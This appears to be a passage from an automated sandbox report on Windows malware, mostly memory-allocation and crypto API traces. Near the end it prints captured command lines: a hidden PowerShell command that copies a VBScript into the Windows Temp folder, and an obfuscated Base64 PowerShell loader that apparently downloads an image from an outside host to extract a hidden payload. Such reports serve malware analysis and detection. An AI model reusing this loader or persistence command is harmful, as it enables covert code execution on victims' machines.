blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f188
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f088
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f088
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f088
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f088
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f088
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f088
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ea88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ea88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ea88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053ec48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053f388
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053e648
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053e648
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501460
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501c20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501c20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501c20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00501b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 932
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01faa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 932
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fa2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0201a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0202b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02027000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02025000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0201c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0202c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02015000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02016000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02017000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02018000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02019000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 932
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceC